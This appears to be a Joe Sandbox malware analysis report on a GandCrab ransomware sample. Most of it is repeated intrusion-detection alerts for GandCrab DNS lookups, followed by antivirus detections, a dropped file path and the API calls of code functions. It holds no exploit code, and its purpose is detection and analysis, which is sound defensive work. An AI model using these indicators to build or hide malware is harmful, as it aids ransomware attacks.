SID:	2829498
Source Port:	51141
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863296532026737 08/31/22-23:50:48.003146
SID:	2026737
Source Port:	63296
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850233532026737 08/31/22-23:49:59.196489
SID:	2026737
Source Port:	50233
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862684532829498 08/31/22-23:49:22.306534
SID:	2829498
Source Port:	62684
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861183532026737 08/31/22-23:48:55.804714
SID:	2026737
Source Port:	61183
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.854195532829498 08/31/22-23:50:17.469831
SID:	2829498
Source Port:	54195
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.860841532829498 08/31/22-23:50:23.096845
SID:	2829498
Source Port:	60841
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862021532026737 08/31/22-23:50:18.975380
SID:	2026737
Source Port:	62021
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.855836532026737 08/31/22-23:50:24.524842
SID:	2026737
Source Port:	55836
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851143532829498 08/31/22-23:49:32.344159
SID:	2829498
Source Port:	51143
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.864083532829498 08/31/22-23:49:52.867185
SID:	2829498
Source Port:	64083
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858788532026737 08/31/22-23:49:35.533597
SID:	2026737
Source Port:	58788
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850509532829498 08/31/22-23:48:51.586247
SID:	2829498
Source Port:	50509
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862436532026737 08/31/22-23:49:47.175608
SID:	2026737
Source Port:	62436
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851440532829498 08/31/22-23:50:03.437869
SID:	2829498
Source Port:	51440
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853640532026737 08/31/22-23:50:13.786207
SID:	2026737
Source Port:	53640
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862911532026737 08/31/22-23:50:41.864871
SID:	2026737
Source Port:	62911
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853339532829498 08/31/22-23:49:03.720004
SID:	2829498
Source Port:	53339
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862023532026737 08/31/22-23:50:19.013875
SID:	2026737
Source Port:	62023
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.855834532026737 08/31/22-23:50:24.482691
SID:	2026737
Source Port:	55834
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858749532829498 08/31/22-23:49:44.051138
SID:	2829498
Source Port:	58749
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858286532829498 08/31/22-23:49:10.608212
SID:	2829498
Source Port:	58286
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851011532026737 08/31/22-23:49:06.014113
SID:	2026737
Source Port:	51011
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851439532829498 08/31/22-23:50:03.414505
SID:	2829498
Source Port:	51439
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859849532829498 08/31/22-23:50:46.658424
SID:	2829498
Source Port:	59849
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850027532026737 08/31/22-23:49:12.888248
SID:	2026737
Source Port:	50027
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859850532829498 08/31/22-23:50:46.682797
SID:	2829498
Source Port:	59850
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863294532026737 08/31/22-23:50:47.961479
SID:	2026737
Source Port:	63294
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859115532829498 08/31/22-23:50:50.920149
SID:	2829498
Source Port:	59115
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862682532829498 08/31/22-23:49:22.268041
SID:	2829498
Source Port:	62682
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859551532026737 08/31/22-23:50:37.037427
SID:	2026737
Source Port:	59551
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850235532026737 08/31/22-23:49:59.234950
SID:	2026737
Source Port:	50235
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861181532026737 08/31/22-23:48:55.077736
SID:	2026737
Source Port:	61181
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862022532026737 08/31/22-23:50:18.995399
SID:	2026737
Source Port:	62022
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853642532026737 08/31/22-23:50:13.835822
SID:	2026737
Source Port:	53642
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850507532829498 08/31/22-23:48:51.544537
SID:	2829498
Source Port:	50507
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.856773532829498 08/31/22-23:50:31.838450
SID:	2829498
Source Port:	56773
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.854197532829498 08/31/22-23:50:17.513889
SID:	2829498
Source Port:	54197
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.860839532829498 08/31/22-23:50:23.058563
SID:	2829498
Source Port:	60839
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.855835532026737 08/31/22-23:50:24.503509
SID:	2026737
Source Port:	55835
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853338532829498 08/31/22-23:49:03.694333
SID:	2829498
Source Port:	53338
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861177532829498 08/31/22-23:50:40.475632
SID:	2829498
Source Port:	61177
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850510532829498 08/31/22-23:48:51.605938
SID:	2829498
Source Port:	50510
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853639532026737 08/31/22-23:50:13.763933
SID:	2026737
Source Port:	53639
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858789532026737 08/31/22-23:49:35.553154
SID:	2026737
Source Port:	58789
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859057532026737 08/31/22-23:50:05.762357
SID:	2026737
Source Port:	59057
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862913532026737 08/31/22-23:50:41.903498
SID:	2026737
Source Port:	62913
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862435532026737 08/31/22-23:49:47.157448
SID:	2026737
Source Port:	62435
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853341532829498 08/31/22-23:49:03.761474
SID:	2829498
Source Port:	53341
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862683532829498 08/31/22-23:49:22.288385
SID:	2829498
Source Port:	62683
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.852109532026737 08/31/22-23:49:25.724789
SID:	2026737
Source Port:	52109
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850029532026737 08/31/22-23:49:12.927716
SID:	2026737
Source Port:	50029
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.864082532829498 08/31/22-23:49:52.826347
SID:	2829498
Source Port:	64082
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859056532026737 08/31/22-23:50:05.744186
SID:	2026737
Source Port:	59056
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850508532829498 08/31/22-23:48:51.564977
SID:	2829498
Source Port:	50508
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.856774532829498 08/31/22-23:50:31.909568
SID:	2829498
Source Port:	56774
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859117532829498 08/31/22-23:50:50.958695
SID:	2829498
Source Port:	59117
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.864081532829498 08/31/22-23:49:52.807469
SID:	2829498
Source Port:	64081
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.852108532026737 08/31/22-23:49:25.704474
SID:	2026737
Source Port:	52108
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862437532026737 08/31/22-23:49:47.194217
SID:	2026737
Source Port:	62437
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859116532829498 08/31/22-23:50:50.938342
SID:	2829498
Source Port:	59116
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859058532026737 08/31/22-23:50:05.782380
SID:	2026737
Source Port:	59058
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859851532829498 08/31/22-23:50:46.705234
SID:	2829498
Source Port:	59851
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851010532026737 08/31/22-23:49:05.994077
SID:	2026737
Source Port:	51010
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862681532829498 08/31/22-23:49:22.247182
SID:	2829498
Source Port:	62681
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851438532829498 08/31/22-23:50:03.395466
SID:	2829498
Source Port:	51438
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862912532026737 08/31/22-23:50:41.885084
SID:	2026737
Source Port:	62912
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850028532026737 08/31/22-23:49:12.908519
SID:	2026737
Source Port:	50028
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859055532026737 08/31/22-23:50:05.722794
SID:	2026737
Source Port:	59055
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853641532026737 08/31/22-23:50:13.814014
SID:	2026737
Source Port:	53641
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.855833532026737 08/31/22-23:50:24.464562
SID:	2026737
Source Port:	55833
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863293532026737 08/31/22-23:50:47.940116
SID:	2026737
Source Port:	63293
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850236532026737 08/31/22-23:49:59.285144
SID:	2026737
Source Port:	50236
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858287532829498 08/31/22-23:49:10.628422
SID:	2829498
Source Port:	58287
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851144532829498 08/31/22-23:49:32.366090
SID:	2829498
Source Port:	51144
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861176532829498 08/31/22-23:50:40.454136
SID:	2829498
Source Port:	61176
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859848532829498 08/31/22-23:50:46.635471
SID:	2829498
Source Port:	59848
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861180532026737 08/31/22-23:48:54.987434
SID:	2026737
Source Port:	61180
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851441532829498 08/31/22-23:50:03.458729
SID:	2829498
Source Port:	51441
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851009532026737 08/31/22-23:49:05.970413
SID:	2026737
Source Port:	51009
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859549532026737 08/31/22-23:50:36.986127
SID:	2026737
Source Port:	59549
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863295532026737 08/31/22-23:50:47.982626
SID:	2026737
Source Port:	63295
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850234532026737 08/31/22-23:49:59.216727
SID:	2026737
Source Port:	50234
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861182532026737 08/31/22-23:48:55.097916
SID:	2026737
Source Port:	61182
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858285532829498 08/31/22-23:49:10.587711
SID:	2829498
Source Port:	58285
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863189532829498 08/31/22-23:50:10.316381
SID:	2829498
Source Port:	63189
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858748532829498 08/31/22-23:49:44.032896
SID:	2829498
Source Port:	58748
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.854196532829498 08/31/22-23:50:17.488065
SID:	2829498
Source Port:	54196
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863190532829498 08/31/22-23:50:10.336236
SID:	2829498
Source Port:	63190
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.860842532829498 08/31/22-23:50:23.114941
SID:	2829498
Source Port:	60842
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858787532026737 08/31/22-23:49:35.450533
SID:	2026737
Source Port:	58787
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: O8ZHhytWhn.exe	Virustotal: Detection: 87%	Perma Link
Source: O8ZHhytWhn.exe	Metadefender: Detection: 78%	Perma Link
Source: O8ZHhytWhn.exe	ReversingLabs: Detection: 92%

Antivirus / Scanner detection for submitted sample

Source: O8ZHhytWhn.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Machine Learning detection for sample

Source: O8ZHhytWhn.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Joe Sandbox ML: detected

Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.0.wjaoab.exe.fbc0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.2.wjaoab.exe.fbc0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.2.wjaoab.exe.fbc0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.wjaoab.exe.fbc0000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	0_2_0F1D4950
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F1D8150
